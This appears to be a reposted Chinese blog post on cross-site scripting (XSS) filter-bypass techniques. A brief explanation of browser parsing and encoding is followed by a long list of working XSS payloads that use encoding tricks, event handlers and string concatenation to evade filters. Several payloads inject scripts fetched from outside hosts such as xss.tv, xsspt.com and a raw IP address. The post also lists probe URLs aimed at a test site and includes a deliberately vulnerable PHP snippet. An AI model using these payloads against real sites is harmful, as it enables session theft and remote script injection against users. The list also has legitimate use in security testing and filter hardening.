【奇淫巧技】XSS绕过技巧

最新推荐文章于 2025-04-19 16:33:14 发布

weixin_30578677

最新推荐文章于 2025-04-19 16:33:14 发布

阅读量1.6k

点赞数 1

文章标签： php javascript ViewUI

原文链接：http://www.cnblogs.com/fox-yu/p/8916497.html

版权

本文详细介绍了跨站脚本(XSS)攻击的各种技巧，包括如何利用弹窗函数、字符编码绕过、引入外部js文件、Unicode编码绕过及换行绕过等方法，并提供了丰富的示例。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

XSS记录

　　1、首先是弹窗函数：

alert(1)
prompt(1)
confirm(1)
eval(）

　　2、然后是字符的编码和浏览器的解析机制：

　　　　要讲编码绕过，首先我们要理解浏览器的解析过程，浏览器在解析HTML文档时无论按照什么顺序，主要有三个过程：HTML解析、JS解析和URL解析，每个解析器负责HTML文档中各自对应部分的解析工作。

　　　　首先浏览器接收到一个HTML文档时，会触发HTML解析器对HTML文档进行词法解析，这一过程完成HTML解码并创建DOM树，接下来JavaScript解析器会介入对内联脚本进行解析，这一过程完成JS的解码工作，如果浏览器遇到需要URL的上下文环境，这时URL解析器也会介入完成URL的解码工作，URL解析器的解码顺序会根据URL所在位置不同，可能在JavaScript解析器之前或之后解析。

　　　　三个解析过程所对应的字符编码分别为：HTML解析 => HTML实体编码、JS解析 => Unicode编码、URL解析 =>URL编码。

需要注意的是：

1、Unicode编码无法转换控制字符如【'】【"】【()】，仅仅会将这些当成普通字符，而不是控制字符，也就是说你无法在<script>标签中利用Unicode编码单双引号来闭合引号。
2、JavaScript伪协议除了HTML编码之外不能进行其他编码，这个单词必须是完整的，因为浏览器最先解析HTML，之后javascript必须是完整的。

　　3、下面我们用实际例子来解释一下以上所说的浏览器解析过程和字符编码是怎么回事，以及今天的重点---XSS绕过。

....暂定

hidden属性标签

插入点在hidden前，新增一个type属性覆盖hidden：
<input value='a' src=1 οnerrοr=alert(1) type="image" type="hidden">


插入点在hidden后，shift+alt+accesskey：
<input value='a' type="hidden" accesskey="x" οnclick=alert(1)>

弹窗验证：

1、弹窗payload

<a href=javascript:alert`1`>click
<button ‘ onclick=alert(1)//>
<button onfocus=alert`122`>
<object data=javascript:alert`1`>
<body/onfocus=alert`9989`>
<input/onfocus=alert`1`>
<svg><script xlink:href=data:,alert(1) />
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg/οnlοad=alert(1)>
<x contenteditable onblur=alert(1)>lose focus!
<i contenteditable onblur=alert(1)>lose focus!//contenteditable：使可编辑
<x oncontextmenu=alert(1)>right click this!
<c oncontextmenu=alert(1)>鼠标右键点击
<iframe src="&Tab;javascript:prompt(1)&Tab;">
<ScRipT 1>prompt(1)</ScRipT 123
<input/οnfοcus=ev\u0061l(\u0061lert(1))>
<input/onfocus=\u0061lert(1)>
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<details ontoggle=alert(1)>
<Video><source onerror="javascript:alert(123)">
<iframe/src='data:text/html,<svg &#111;&#110;load=alert(1)>'>
[media=mp3,200,300]http://www.tudou.com/programs/view/a' οnlοad=alert(1) οnerrοr=alert(1)[/media]
<img/src=1 onmouseout=alert`1`>
<a href="#" onclick=alert(‘\170\163\163’)>test3</a>  //可以成功执行
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<form><button formaction=javascript&colon;alert(1)>CLICKME
<img src="1" onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>//必须要有双引号，不然执行不了
<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2//不能去掉双引号
<a href=javascript:eval("&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;")>2  //可以去掉双引号
<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;">2</a>
<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#47&#120&#115&#115&#47&#41>XSStest</a>
<img src=9989 onerror="window['al\u0065rt'](111)">
<IMG SRC=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<img src=9989 onerror=a=\u0061lert,a(1)>
<input/οninput=top['al\x65rt'](1)>
<img src=9989 onerror=[1].find(alert)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
//以下都是要把[]进行url编码
<img src=9989 onerror=top%5B%2fal%2f.source%2b%2fert%2f.source%5D%281%29>   　　//<img src=9989 onerror=top[/al/.source+/ert/.source](1)>
<img src=9989 onerror=top%5B%22al%22%2b%22ert%22%5D%281%29>    　　　　　　　　　　//<img src=9989 onerror=top["al"+"ert"](1)>
<img src=9989 onerror=top%5B%27al%5C145rt%27%5D%281%29>　　　　　　　　　　　　　　 //<img src=9989 onerror=top['al\145rt'](1)>
<img src=9989 onerror=top%5B'al\x65rt'%5D(1)>　　　　　　　　　　　　　　　　　　　　//<img src=9989 onerror=top['al\x65rt'](1)>
<img/src/οnerrοr=top[8680439..toString`30`]`1`>
top[8680439..toString`30`]
top[/al/.source+/ert/.source]
onError="%26#x61lert(1)" 
<img/src='a'οnerrοr=[1].find(alert)>
<img/src='2'οnerrοr=top[8680439..toString(30)](1)>
<a/href=javascript&colon;alert&grave;1&grave;>123</ a>
<img/src='2'οnerrοr=top[/al/.source+/ert/.source](1)>
<p/οncοpy=alert(1)>

<div onscroll=alert`1`>
<a href=javascript:confirm(1)>MM</a>

2、引入外部js，需要有jQuery库

<html>
<head>
<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.js"></script>
</head>
<body>

<img/src=1 onerror=$.getScript("http://118.24.154.114/1.js");>

</body>
</html>

3、Unicode编码绕过例子

<html>
<head>
</head>
<body>
    
<div id="s"></div>

<script>
    var s="\u003cimg/src=1\u003e";    document.getElementById('s').innerHTML = s;
</script>

</body>
</html>

以上代码由于使用了innerHTML 方法，可以使用Unicode表面皿绕过检测。

4、利用巧用换行绕过url规则检测：

<?php
$url = filter_var($_GET['url'],FILTER_VALIDATE_URL);
var_dump($url);
$url = htmlspecialchars($url);
var_dump($url);
echo "<a href='$url'>Next slide</a>"
?>

利用代码：

<img/src=1 onmouseover=s=createElement('\163\143\162\151\160\164');body.appendChild(s);s.src="//xss.tv">
<img src=1 οnerrοr="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='\150\164\164\160\72\'">  JS 8进制

下面是一位大佬的文章，这里直接引用了，有空再整理。

https://bbs.ichunqiu.com/thread-31886-1-1.html

这里的连接字符，我研究出来一些payload，能够script,document等危险字符过滤的情况下，不需要在任何编码的情况下，去构造一个payload

当document被过滤的情况下，又不能用编码
+被过滤，又不能编码
<svg/onload="[1].find(function(){with(`\docomen\.1\t\.1`);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">

<svg/onload="[1].find(function(){with(`docom%27|e|%27nt`);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">

<svg/onload="[1].find(function(){with(`docom%27%2Be%2B%27nt`);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">

<svg/onload="[1].find(function(){with(`docom'+e+'nt`);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">

<svg/onload="[1].find(function(){with(`docom'-e-'nt`);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

<svg/onload="[1].find(function(){with(`docom'*e*'nt`);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

<svg/onload="[1].find(function(){with(`docom'/e/'nt`);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

<svg/onload="[1].find(function(){with(`docom'%e%'nt`);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

<svg/onload="[1].find(function(){with(`docom'^e^'nt`);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

<svg/onload="[1].find(function(){with(`docom'>e>'nt`);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

<svg/onload="[1].find(function(){with(`docom'<e<'nt`);;body.appendChild(createElement('\163\143\162\151\160\164')).src='http://xss.tv/XA'})">

<script type="text/javascript">
　　var a = ''>=alert``<='';
　　var a = ''+alert``+'';
</script>

<keygen autofocus onfocus=s=createElement("scriPt");body.appendChild(s);s.src="//xsspt.com/JUvhKT">支持火狐 360, 谷歌失败,过主机卫士



就是下面这些连接符号

输出在script内字符串位置的情况
如果允许闭合字符串，直接闭合并写入javascript即可，如: 
http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27
http://t.mhz.pw/game/xss/scriptstr.php?xss='|alert(1)|'
http://t.mhz.pw/game/xss/scriptstr.php?xss=%27%2Balert(1)%2B%27
http://t.mhz.pw/game/xss/scriptstr.php?xss='+alert(1)+'
http://t.mhz.pw/game/xss/scriptstr.php?xss='-alert(1)-'
http://t.mhz.pw/game/xss/scriptstr.php?xss='*alert(1)*'
http://t.mhz.pw/game/xss/scriptstr.php?xss='/alert(1)/'
http://t.mhz.pw/game/xss/scriptstr.php?xss='%alert(1)%'
http://t.mhz.pw/game/xss/scriptstr.php?xss='^alert(1)^'
http://t.mhz.pw/game/xss/scriptstr.php?xss='>alert(1)>'
http://t.mhz.pw/game/xss/scriptstr.php?xss='<alert(1)<'
http://t.mhz.pw/game/xss/scriptstr.php?xss='>=alert(1)>='
http://t.mhz.pw/game/xss/scriptstr.php?xss='<=alert(1)<='
http://t.mhz.pw/game/xss/scriptstr.php?xss='==alert(1)=='
http://t.mhz.pw/game/xss/scriptstr.php?xss='===alert(1)==='
http://t.mhz.pw/game/xss/scriptstr.php?xss='!=alert(1)!='
http://t.mhz.pw/game/xss/scriptstr.php?xss='!==alert(1)!=='
http://t.mhz.pw/game/xss/scriptstr.php?xss='%26alert(1)%26'
http://t.mhz.pw/game/xss/scriptstr.php?xss='&alert(1)&'
http://t.mhz.pw/game/xss/scriptstr.php?xss='|alert(1)|'
http://t.mhz.pw/game/xss/scriptstr.php?xss='||alert(1)||'
http://t.mhz.pw/game/xss/scriptstr.php?xss='>=alert(1)<='



<svg/onload="[1].find(function(){with(`docom'|e|'nt`);;body.appendChild(createElement('script')).src='http://xss.tv/XA'})">

<svg/onload=[1].find(function(){with(/do/.source+/cument/.source)body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

<svg/onload=[1].find(function(){with(/docomen/.source+/t/.source);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

<svg/onload=[1].find(function(){with(`/docomen/.source+/t/.source`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

<svg/onload=[1].find(function(){with(`/docomen/.1+/t/.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

/字符/.1+/字符/.1
字符加上字符
//.1 + //.1  这些只是连接字符的方式而已 ，总结起来就是 document而已


<svg/onload=[1].find(function(){with(`\docomen\.1+\t\.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/ 换成 \ 也可以


<svg/onload=[1].find(function(){with(`\docomen\.1\t\.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
不要加号也可以


<svg/onload=[1].find(function(){with(`=docomen=.1+=t=.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/换成=号也可以

<svg/onload=[1].find(function(){with(`=docomen=.1=t=.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
不要加号也可以


<svg/onload=[1].find(function(){with(`^docomen^.1+^t^.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/换成^号也可以

<svg/onload=[1].find(function(){with(`^docomen^.1^t^.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>



<svg/onload=[1].find(function(){with(`|docomen|.1+|t|.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/换成|号也可以

<svg/onload=[1].find(function(){with(`|docomen|.1|t|.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>



<svg/onload=[1].find(function(){with(`&docomen&.1+&t&.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/换成&号也可以
<svg/onload=[1].find(function(){with(`&docomen&.1&t&.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>


<svg/onload=[1].find(function(){with(`%26docomen%26.1+$26t%26.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
/换成%26也行


<svg/onload=[1].find(function(){with(`%26docomen%26.1$26t%26.1`);;body.appendChild(createElement("script")).src="http://xss.tv/XA"})>
不要引号也行

Body加上括号也行
<svg/onload=[1].find(function(){with(`docomen`);(body.appendChild(createElement('script'))).src='http://xss.tv/XA'})>


<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,115,115,46,102,98,105,115,98,46,99,111,109,47,48,71,73,103,62,60,47,115,99,114,105,112,116,62))> 



<svg/onload=[1].find(function(){with('docu'==='ment');body.appendChild(createElement("script")).src="http://xss.tv/XA"})>

笨鸟先飞早入林，笨人勤学早成材。

转载请注明出处：
撰写人：fox-yu  http://www.cnblogs.com/fox-yu/

转载于:https://www.cnblogs.com/fox-yu/p/8916497.html